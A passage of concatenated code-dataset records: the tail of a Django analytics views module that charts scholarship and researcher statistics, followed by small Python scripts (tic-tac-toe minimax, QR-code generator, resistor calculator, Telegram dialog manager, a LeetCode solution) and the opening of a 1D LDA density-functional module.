keywords])\n print(keywords)\n return render(request, template_name='analytics/abstract.html',\n context={'authors': authors, 'abstract': abstract, 'keywords': keywords})\n return render(request, template_name='analytics/abstract.html',\n context={'authors': [], 'abstract': None})\n\n\ndef show_abstract_per_person(request):\n data = []\n for rec in conn.execute(\" select status, count(*) as c from scholarship_info group by status;\"):\n data.append(rec[1])\n return JsonResponse({'data': data})\n\ndef get_num_active_scholar_studs(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_abstract_fields(request):\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n data = []\n labels = []\n backgroundColors = []\n for f,n in conn.execute(sqlquery):\n data.append(n)\n labels.append(f)\n backgroundColors.append('rgb(100,116,164)')\n\n return JsonResponse({'data': data, 'labels': labels, 'backgroundColors': backgroundColors})\n\n\ndef get_researcher_by_field(request):\n inactive_counts = defaultdict(int)\n active_counts = defaultdict(int)\n\n all_researchers = defaultdict(dict)\n sqlquery = ('select authors.id,research_fields.abbr,count(research_fields.abbr) as num_papers from field_has_abstract inner join research_fields on field_has_abstract.field_id=research_fields.id '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=field_has_abstract.abstract_id '\n 'inner join authors on authors.id=abstract_has_author.author_id '\n 'inner join scholarship_info on scholarship_info.id=authors.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by authors.id,abbr '\n 'order by authors.id,num_papers desc;')\n for auth_id, field_abbr, num_papers in conn.execute(sqlquery):\n if auth_id not in all_researchers:\n all_researchers[auth_id] = field_abbr\n\n active_researchers = set()\n sqlquery = 'select author_id from active_scholar_students;'\n for row in conn.execute(sqlquery):\n active_researchers.add(row[0])\n\n\n for auth_id in all_researchers:\n if auth_id in active_researchers:\n active_counts[all_researchers[auth_id]] += 1\n else:\n inactive_counts[all_researchers[auth_id]] += 1\n\n actives = []\n inactives = []\n labels = []\n activecolors = []\n inactivecolors = 
[]\n data = [(k,v) for k,v in active_counts.items()]\n sorted_fields = [k for k,v in sorted(data,key=lambda x: x[1], reverse=True)]\n for field in sorted_fields:\n actives.append(active_counts[field])\n inactives.append(inactive_counts[field])\n labels.append(field)\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n\n return JsonResponse({'actives': actives, 'inactives': inactives,\n 'labels': labels,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors})\n\n\ndef get_scholar_joined_tm_ratio(request):\n sqlquery = ('select count(*) as c from tm_researcher_profile;')\n total_tm = conn.execute(sqlquery).scalar()\n sqlquery = ('select count(*) as c from tm_researcher_profile '\n 'where scholarship_info_id is not NULL')\n total_scholar = conn.execute(sqlquery).scalar()\n return JsonResponse({'data': [total_scholar, total_tm],\n 'labels': ['scholarship', 'non-scholarship']})\n\n\ndef get_num_active_scholar_tm(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_activeness_scholar_tm(request):\n tm_actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on active_scholar_students.scholarship_info_id=scholarship_info.id '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=active_scholar_students.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n for affil, cnt in conn.execute(sqlquery):\n tm_actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n labels = []\n inactive_data = []\n active_data = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in totals.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n if k in tm_actives:\n inactive_data.append(totals[k]-tm_actives[k])\n active_data.append(tm_actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef 
get_tm_researchers_graph_data(request):\n sqlquery = ('select authors.id from authors '\n 'inner join scholarship_info on authors.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true')\n\n scholars = set()\n for row in conn.execute(sqlquery):\n scholars.add(row[0])\n\n\n sqlquery = ('select authors.id, abstracts.id from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'inner join authors on scholarship_info.id=authors.scholarship_info_id '\n 'inner join abstract_has_author on abstract_has_author.author_id=authors.id '\n 'inner join abstracts on abstract_has_author.abstract_id=abstracts.id '\n 'where scholarship_info.status=true '\n )\n\n tm_abstracts = set()\n tm_authors = set()\n for author_id, abstract_id in conn.execute(sqlquery):\n tm_abstracts.add(abstract_id)\n tm_authors.add(author_id)\n\n sqlquery = ('select authors.id,authors.first_name, authors.last_name,abstracts.id from abstracts '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=abstracts.id '\n 'inner join authors on abstract_has_author.author_id=authors.id;'\n )\n abstracts = {}\n for author_id, first_name, last_name, abstract_id in conn.execute(sqlquery):\n if abstract_id in tm_abstracts:\n if abstract_id in abstracts:\n abstracts[abstract_id].append((author_id, '{} {}'.format(first_name, last_name)))\n else:\n abstracts[abstract_id] = [(author_id, '{} {}'.format(first_name, last_name))]\n\n edges = {}\n nodes = {}\n n = 0\n for abstract_id, authors in abstracts.items():\n n += 1\n first_author_id = authors[0][0]\n if first_author_id not in nodes:\n nodes[first_author_id] = {'name': authors[0][1], 'papers': 1}\n else:\n nodes[first_author_id]['papers'] += 1\n if first_author_id not in edges:\n edges[first_author_id] = {}\n if len(authors) > 1:\n for author in authors[1:]:\n if author[0] not in nodes:\n nodes[author[0]] = {'name': author[1], 'papers': 1}\n else:\n nodes[author[0]]['papers'] += 1\n if author[0] in edges and edges[author[0]].get(first_author_id, None):\n continue\n else:\n edges[first_author_id][author[0]] = edges[first_author_id].get(author[0], 0) + 1\n\n nodes_data = []\n edges_data = []\n flt_nodes = set()\n for n in nodes:\n if nodes[n]['papers'] > 2:\n flt_nodes.add(n)\n if n in tm_authors:\n color = '#ff9900'\n elif n in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': n,\n 'value': nodes[n]['papers'],\n 'label': nodes[n]['name'],\n 'color': color\n })\n for _from in list(flt_nodes):\n for _to in edges.get(_from, []):\n if edges[_from][_to] >= 1:\n edges_data.append({\n 'from': _from,\n 'to': _to,\n 'value': edges[_from][_to],\n 'title': '{} publications'.format(edges[_from][_to])\n })\n if _to not in flt_nodes:\n if _to in tm_authors:\n color = '#ff9900'\n elif n in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': _to,\n 'value': nodes[_to]['papers'],\n 'label': nodes[_to]['name'],\n 'color': color\n })\n flt_nodes.add(_to)\n\n\n return JsonResponse({'edges': edges_data, 'nodes': nodes_data})\n\n\ndef show_scholar_dashboard(request):\n return render(request, template_name=\"analytics/scholar-dashboard.html\",\n context={'board': 'scholar'})\n\ndef show_gjb_dashboard(request):\n return render(request, template_name=\"analytics/gjb-dashboard.html\",\n context={'board': 'gjb'})\n\ndef show_tm_dashboard(request):\n return render(request, template_name=\"analytics/tm-dashboard.html\",\n context={'board': 
'tm'})\n\ndef show_network_dashboard(request):\n    return render(request, template_name=\"analytics/network-dashboard.html\",\n                  context={'board': 'network'})\n\ndef count_gjb_by_status(request):\n    data = []\n    sqlquery = (\"select count(*), finished from gjb_researcher_profile inner join gjb_theses on gjb_researcher_profile.id=gjb_theses.researcher_id group by finished\")\n    for rec in conn.execute(sqlquery):\n        data.append(rec[0])\n    return JsonResponse({'data': data})\n\ndef count_gjb_by_status_affil(request):\n    data = []\n    sqlquery = (\"select count(*),finished, university_th from gjb_researcher_profile as gp \"\n                \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n                \"group by finished,university_th order by university_th\")\n    labels = []\n    unfinished_data = []\n    finished_data = []\n    finished_colors = []\n    unfinished_colors = []\n    finished_dict = defaultdict(int)\n    unfinished_dict = defaultdict(int)\n    for cnt, finished, affil in conn.execute(sqlquery):\n        if finished:\n            finished_dict[affil] += cnt\n        else:\n            unfinished_dict[affil] += cnt\n\n    sorted_finished_data = sorted([(k,v) for k,v in finished_dict.items()],\n                                  key=lambda x: x[1], reverse=True)\n    for k,v in sorted_finished_data:\n        unfinished_data.append(unfinished_dict[k])\n        finished_data.append(finished_dict[k])\n        finished_colors.append('rgb(199,0,57)')\n        unfinished_colors.append('rgb(100,116,164)')\n        labels.append(k)\n\n    return JsonResponse({'actives': finished_data,\n                         'inactives': unfinished_data,\n                         'activecolors': finished_colors,\n                         'inactivecolors': unfinished_colors,\n                         'labels': labels})\n\ndef count_active_gjb_researcher(request):\n    active_university_dict = defaultdict(int)\n    inactive_university_dict = defaultdict(int)\n    total_university_dict = defaultdict(int)\n    for res in conn.execute(\n            'select * from gjb_researcher_profile as gp inner join gjb_theses on gjb_theses.researcher_id=gp.id where gjb_theses.finished=TRUE'):\n        uni = res[11]\n        total_university_dict[uni] += 1\n        if res[5] and res[6]:\n            first_name, last_name = res[5].lower(), res[6].lower()\n            sqlquery = \"select * from recent_pubs where lower(first_name)='%s' and lower(last_name)='%s'\" % (\n                first_name, last_name)\n            total_pubs = list(pubconn.execute(sqlquery))\n            if len(total_pubs) > 0:\n                active_university_dict[uni] += 1\n    for uni in total_university_dict:\n        inactive_university_dict[uni] = total_university_dict[uni] - active_university_dict[uni]\n\n    sorted_active_data = sorted([(k,v) for k,v in active_university_dict.items()],\n                                key=lambda x: x[1], reverse=True)\n    active_data = []\n    inactive_data = []\n    active_colors = []\n    inactive_colors = []\n    labels = []\n    for k,v in sorted_active_data:\n        active_data.append(active_university_dict[k])      # the active/inactive counts were\n        inactive_data.append(inactive_university_dict[k])  # appended to the wrong lists here\n        active_colors.append('rgb(199,0,57)')\n        inactive_colors.append('rgb(100,116,164)')\n        labels.append(k)\n\n    return JsonResponse({'actives': active_data,\n                         'inactives': inactive_data,\n                         'activecolors': active_colors,\n                         'inactivecolors': inactive_colors,\n                         'labels': labels})\n\ndef count_gjb_pub_by_field(request):\n    fields = defaultdict(int)\n    sc_fields = defaultdict(int)\n    for res in conn.execute(\"select * from gjb_researcher_profile as gp \"\n                            \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n                            \"where gjb_theses.finished=TRUE\"):\n        if res[5] and res[6]:\n            first_name, last_name = res[5].lower(), res[6].lower()\n            sqlquery = (\"select * from recent_pubs where lower(first_name)='%s' \"\n                        \"and lower(last_name)='%s'\") % (first_name, last_name)\n            for rec in 
pubconn.execute(sqlquery):\n field = rec[3]\n fields[field] += 1\n\n\n gjb_counts = []\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n sc_counts = []\n labels = []\n for f,n in conn.execute(sqlquery):\n sc_fields[f] += n\n\n for field in fields:\n labels.append(field)\n gjb_counts.append(fields[field])\n sc_counts.append(sc_fields[field])\n\n\n return JsonResponse({'gjb_counts': gjb_counts, 'labels': labels, 'sc_counts': sc_counts})\n\n","sub_path":"web/code/tm/analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
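The `count_active_gjb_researcher` and `count_gjb_pub_by_field` views above interpolate researcher names straight into SQL with `%` formatting. A minimal sketch of the same per-researcher lookup with bound parameters, assuming `pubconn` is a SQLAlchemy connection (the `.scalar()` calls elsewhere in this file suggest it is); table and column names are taken from the original queries, the helper name is hypothetical:

```python
# Sketch only: bound parameters (:fn, :ln) let the driver handle quoting,
# avoiding SQL injection and breakage on names that contain quote characters.
from sqlalchemy import text

def count_recent_pubs(pubconn, first_name, last_name):
    sqlquery = text(
        "select count(*) from recent_pubs "
        "where lower(first_name)=:fn and lower(last_name)=:ln"
    )
    return pubconn.execute(sqlquery, {"fn": first_name.lower(),
                                      "ln": last_name.lower()}).scalar()
```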
+{"seq_id":"142980084","text":"import random\n\nBOARD = ['a1', 'a2', 'a3', 'b1', 'b2', 'b3', 'c1', 'c2', 'c3']\nwin = [['a1', 'a2', 'a3'], ['b1', 'b2', 'b3'], ['c1', 'c2', 'c3'], ['a1', 'b1', 'c1'], ['a2', 'b2', 'c2'], ['a3', 'b3', 'c3'], ['a1', 'b2', 'c3'], ['a3', 'b2', 'c1']]\n\ndef minimax(ox, oz, depth, level, player):\n    if depth == 0:\n        for pos in win:\n            ok = 1\n            for i in pos:\n                if not (i in ox):\n                    ok = 0\n                    break\n            if ok == 1:\n                return 1 if player else -1\n            ok = 1\n            for i in pos:\n                if not(i in oz):\n                    ok = 0\n                    break\n            if ok == 1:\n                return 1 if player == False else -1\n        return 0\n    alfa = -1000\n    available = list(set(BOARD) - set(ox) - set(oz))\n    for child in available:\n        if level == False:\n            oz_ = oz[:]\n            oz_.append(child)\n            alfa = max(alfa, -minimax(ox, oz_, depth-1, not(level), player))\n        else:\n            ox_ = ox[:]\n            ox_.append(child)\n            alfa = max(alfa, -minimax(ox_, oz, depth-1, not(level), player))\n    return alfa\n\n\ndef play_turn(\n        player_role,\n        owned_by_x,\n        owned_by_zero\n        ):\n\n    #print player_role, owned_by_x, owned_by_zero\n    available_squares = list(set(BOARD) - set(owned_by_x) - set(owned_by_zero))\n    best1 = -1\n    best2 = 1\n    el = BOARD[0]\n    for i in available_squares:\n        if player_role == 'x':\n            x = owned_by_x[:]\n            x.append(i)\n            # evaluate the board with the candidate move applied (the copy was\n            # built but then ignored), handing the turn to 'zero' (level=False)\n            mini = minimax(x, owned_by_zero, len(available_squares)-1, False, True)\n            if mini > best1:\n                best1 = mini\n                el = i\n        else:\n            z = owned_by_zero[:]\n            z.append(i)\n            mini = minimax(owned_by_x, z, len(available_squares)-1, True, False)\n            if mini < best2:\n                best2 = mini\n                el = i\n    return el\n    #return random.choice(available_squares)\n\n","sub_path":"tictactoe/adibranescu/tictactoe_play_turn.py","file_name":"tictactoe_play_turn.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
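A short, hypothetical usage sketch for `play_turn` above; the `winner` helper factors out the line-scan that `minimax` duplicates for each side and is not part of the original file:

```python
# BOARD and win are the module-level definitions from the file above.
def winner(occupied):
    """Return True if the occupied squares contain any winning line."""
    squares = set(occupied)
    return any(all(cell in squares for cell in line) for line in win)

# x holds a1 and b2; a sound engine should complete the diagonal with c3.
move = play_turn('x', ['a1', 'b2'], ['a2', 'a3'])
print(move, winner(['a1', 'b2', move]))
```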
+{"seq_id":"206761772","text":"import qrcode\n\nqr = qrcode.QRCode(\n version=5,\n box_size=5,\n border=2\n)\ndata = 'www.billavamsikrishna.co'\nqr.add_data(data)\nqr.make(fit=True)\nimg = qr.make_image(fill_color='green',back_color='white')\nimg.save('vamsi.png')\n","sub_path":"Making a py qr code/qrcodevamsi.py","file_name":"qrcodevamsi.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
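For context, `qrcode.QRCode` also accepts an error-correction level (the constants below are part of the library's public API); a variant of the snippet above using the highest level, which lets roughly 30% of the symbol be damaged and still decode:

```python
import qrcode

qr = qrcode.QRCode(
    version=5,
    error_correction=qrcode.constants.ERROR_CORRECT_H,  # ~30% recoverable
    box_size=5,
    border=2,
)
qr.add_data('www.billavamsikrishna.co')
qr.make(fit=True)
qr.make_image(fill_color='green', back_color='white').save('vamsi_hq.png')
```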
+{"seq_id":"24499598","text":"n_max = 150  # maximum number of resistors in the combination\ncnt = 0\nprint(\"======= Resistor combination calculator =========\")\nvalue = float(input(\"Value of the fixed resistor: \"))\nobj_value = float(input(\"Desired resistance value: \"))\nobj_err = float(input(\"Maximum resistance error: \"))\n\nprint(\"**********************************************************************\")\nprint(\"\")\nfor p in range(1, n_max):\n    for s2 in range(1, n_max):\n        for s1 in range(1, n_max):\n            n = s1*s2*p\n            if n <= n_max:\n                res = ((value * s1)/p)*s2\n                error = abs(obj_value - res)\n                if error < obj_err:\n                    print(\"Value: %.3f, Error = %.3f, N = %i, s1 = %i, s2 = %i, p = %i\" % (res, error, n, s1, s2, p))\n                    cnt = cnt + 1\nprint(\"\")\nprint(\"**********************************************************************\")\nprint(\"Possible combinations: %i\" % (cnt))\nprint(\"\")\nprint(\"\")\n","sub_path":"res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
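The expression `((value * s1) / p) * s2` in the search corresponds to one specific topology: `s1` resistors in series form a string (series resistance is the sum, so `R * s1`), `p` identical strings in parallel divide that by `p` (from `1/R_parallel = sum(1/R_i)`), and `s2` such banks in series multiply by `s2`, using `N = s1 * s2 * p` parts in total. A small helper making that reading explicit (illustrative, not from the original script):

```python
def combo_resistance(r, s1, p, s2):
    string_r = r * s1      # s1 resistors in series
    bank_r = string_r / p  # p identical strings in parallel
    return bank_r * s2     # s2 banks in series

# Sanity check with 100-ohm parts: two in series, two strings in parallel
# brings the total back to 100 ohms using 4 resistors.
print(combo_resistance(100.0, s1=2, p=2, s2=1))  # 100.0
```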
+{"seq_id":"262914079","text":"from .dialog_manager_super import DialogManagerBase\n\n\nclass TelegramDialogManager(DialogManagerBase):\n\n def initialize_episode(self):\n \"\"\" Refresh state for new dialog \"\"\"\n\n super().initialize_episode()\n self.user.initialize_episode()\n self.agent.initialize_episode()\n\n def next_turn(self, message):\n \"\"\" This function initiates each subsequent exchange between agent and user (agent first) \"\"\"\n\n ########################################################################\n # CALL USER TO TAKE HER TURN\n ########################################################################\n\n user_action = self.user.next(message)\n self.state_tracker.update(user_action=user_action)\n\n ########################################################################\n # CALL AGENT TO TAKE HER TURN\n ########################################################################\n\n agent_state = self.state_tracker.get_state_for_agent()\n agent_action = self.agent.state_to_action(agent_state)\n\n ########################################################################\n # Register AGENT action with the state_tracker\n ########################################################################\n self.state_tracker.update(agent_action=agent_action)\n\n self.agent.add_nl_to_action(agent_action)\n agent_ans = agent_action['act_slot_response']['nl']\n\n if user_action['diaact'] == \"thanks\":\n agent_ans = 'Thank you, good bye!'\n self.episode_over = True\n\n return self.episode_over, agent_ans","sub_path":"src/deep_dialog/dialog_system/dialog_manager_telegram.py","file_name":"dialog_manager_telegram.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
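A hedged sketch of how a message handler might drive `TelegramDialogManager`, using only the two methods defined above; constructing `dm` and sourcing messages are left to the surrounding bot framework, and the base class presumably wires up `user`, `agent`, and `state_tracker`:

```python
def handle_incoming(dm, message):
    # One user/agent exchange per incoming message; reset when the dialog ends.
    episode_over, agent_ans = dm.next_turn(message)
    if episode_over:
        dm.initialize_episode()
    return agent_ans
```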
+{"seq_id":"36054575","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n# author:lwz\n\ntext = \"loveleetcode\"\n\nclass Solution:\n    def firstUniqChar(self, s):\n        # map each character to the list of indices where it occurs;\n        # renamed from str/obj/min, which shadowed the built-ins\n        positions, first = {}, len(s)\n        for i, ch in enumerate(s):\n            if ch in positions:\n                positions[ch].append(i)\n            else:\n                positions.setdefault(ch, [i])\n        for ch in positions:\n            if len(positions[ch]) == 1:\n                first = positions[ch][0] if positions[ch][0] < first else first\n        if first == len(s):\n            return -1\n        return first\n\nsolution = Solution()\nprint(solution.firstUniqChar(text))\n","sub_path":"Week 08/id_524/LeetCode_387_524.py","file_name":"LeetCode_387_524.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
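The same problem is commonly solved in two passes with `collections.Counter`: count all characters, then return the index of the first one whose count is 1, which avoids storing every occurrence index:

```python
from collections import Counter

def first_uniq_char(s):
    counts = Counter(s)
    for i, ch in enumerate(s):
        if counts[ch] == 1:
            return i
    return -1

print(first_uniq_char("loveleetcode"))  # 2, the index of 'v'
```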
+{"seq_id":"623726666","text":"\"\"\"Uses the [adiabatic] local density approximation ([A]LDA) to calculate the [time-dependent] \nelectron density [and current] for a system of N electrons.\n\nComputes approximations to V_KS, V_H, V_xc using the LDA self-consistently. For ground state \ncalculations the code outputs the LDA orbitals and energies of the system, the ground-state \ncharge density and Kohn-Sham potential. For time dependent calculations the code also outputs \nthe time-dependent charge and current densities and the time-dependent Kohn-Sham potential.\n\nNote: Uses the LDAs developed in [Entwistle2018]_ from finite slab systems and the HEG, \nin one dimension.\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport copy\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nimport scipy.linalg as spla\nimport scipy.sparse.linalg as spsla\n\nfrom . import LDA_parameters\nfrom . import RE_cython\nfrom . import results as rs\nfrom . import mix\nfrom . import minimize\n\n\ndef groundstate(pm, H):\n r\"\"\"Calculates the ground-state of the system for a given potential.\n\n .. math:: \n \n \\hat{H} \\phi_{j} = \\varepsilon_{j} \\phi_{j}\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n \"\"\"\n # Solve the Kohn-Sham equations\n eigenvalues, orbitals = spla.eig_banded(H, lower=True)\n \n # Normalise the orbitals\n orbitals /= np.sqrt(pm.space.delta)\n\n # Calculate the electron density\n density = electron_density(pm, orbitals)\n\n return density, orbitals, eigenvalues\n\n\ndef electron_density(pm, orbitals):\n r\"\"\"Calculates the electron density from the set of orbitals.\n\n .. math:: \n\n n(x) = \\sum_{j=1}^{N}|\\phi_{j}(x)|^{2}\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n \"\"\"\n density = np.sum(np.absolute(orbitals[:,:pm.sys.NE])**2, axis=1)\n\n return density\n\n\ndef ks_potential(pm, density, perturbation=False):\n r\"\"\"Calculates the Kohn-Sham potential from the electron density.\n\n .. 
math::\n\n V_{\\mathrm{KS}} = V_{\\mathrm{ext}} + V_{\\mathrm{H}} + V_{\\mathrm{xc}}\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n \"\"\"\n v_ks = pm.space.v_ext + hartree_potential(pm, density) + xc_potential(pm, density)\n if perturbation:\n v_ks += pm.space.v_pert\n\n return v_ks\n\n\ndef banded_to_full(pm, H):\n r\"\"\"Converts the Hamiltonian matrix in band form to the full matrix.\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n \"\"\"\n # Stencil used\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Add the band elements to the full matrix\n H_full = np.zeros((pm.space.npt,pm.space.npt), dtype=np.float)\n for ioff in range(nbnd):\n d = np.arange(pm.space.npt-ioff)\n H_full[d,d+ioff] = H[ioff,d]\n H_full[d+ioff,d] = H[ioff,d]\n\n return H_full\n\n\ndef kinetic(pm):\n r\"\"\"Stores the band elements of the kinetic energy matrix in lower form. The kinetic energy matrix \n is constructed using a three-point, five-point or seven-point stencil. This yields an NxN band \n matrix (where N is the number of grid points). For example with N=6 and a three-point stencil:\n \n .. math::\n\n K = -\\frac{1}{2} \\frac{d^2}{dx^2}= \n -\\frac{1}{2} \\begin{pmatrix} \n -2 & 1 & 0 & 0 & 0 & 0 \\\\ \n 1 & -2 & 1 & 0 & 0 & 0 \\\\ \n 0 & 1 & -2 & 1 & 0 & 0 \\\\ \n 0 & 0 & 1 & -2 & 1 & 0 \\\\ \n 0 & 0 & 0 & 1 & -2 & 1 \\\\ \n 0 & 0 & 0 & 0 & 1 & -2 \n \\end{pmatrix} \n \\frac{1}{\\delta x^2} \n = [\\frac{1}{\\delta x^2},-\\frac{1}{2 \\delta x^2}] \n\n parameters\n ----------\n pm : object\n Parameters object\n\n returns array_like\n 2D array containing the band elements of the kinetic energy matrix, indexed as \n K[band,space_index]\n \"\"\"\n # Stencil to use\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Band elements\n K = np.zeros((nbnd, pm.space.npt), dtype=np.float)\n for i in range(nbnd):\n K[i,:] = -0.5 * sd[i]\n\n return K\n\n\ndef hamiltonian(pm, v_ks=None, orbitals=None, perturbation=False):\n r\"\"\"Constructs the Hamiltonian matrix in band form for a given Kohn-Sham potential.\n\n .. 
math::\n\n \\hat{H} = \\hat{K} + \\hat{V}_{\\mathrm{KS}}\n\n parameters\n ----------\n pm : object\n Parameters object\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n \"\"\"\n # Kinetic energy matrix\n H = kinetic(pm)\n\n # Calculate the Kohn-Sham potential from the orbitals\n if orbitals is not None:\n density = electron_density(pm, orbitals)\n if perturbation:\n v_ks = ks_potential(pm, density, perturbation=True) \n else:\n v_ks = ks_potential(pm, density)\n\n # Add the Kohn-Sham potential to the Hamiltonian\n H[0,:] += v_ks\n\n return H\n\n\ndef hartree_potential(pm, density):\n r\"\"\"Calculates the Hartree potential for a given electron density.\n\n .. math::\n\n V_{\\mathrm{H}}(x) = \\int U(x,x') n(x') dx'\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n\n returns array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n \"\"\"\n v_h = np.dot(pm.space.v_int,density)*pm.space.delta\n\n return v_h\n\n\ndef hartree_energy(pm, v_h, density):\n r\"\"\"Calculates the Hartree energy of the ground-state system.\n\n .. math::\n\n E_{\\mathrm{H}}[n] = \\frac{1}{2} \\int \\int U(x,x') n(x) n(x') dx dx'\n = \\frac{1}{2} \\int V_{\\mathrm{H}}(x) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n v_h : array_like\n 1D array of the ground-state Hartree potential, indexed as v_h[space_index]\n density : array_like\n 1D array of the ground-state electron density, indexed as density[space_index]\n\n returns float\n The Hartree energy of the ground-state system\n \"\"\"\n E_h = 0.5*np.dot(v_h,density)*pm.space.delta\n\n return E_h\n\n\ndef xc_energy(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation energy. Uses the LDAs developed in \n 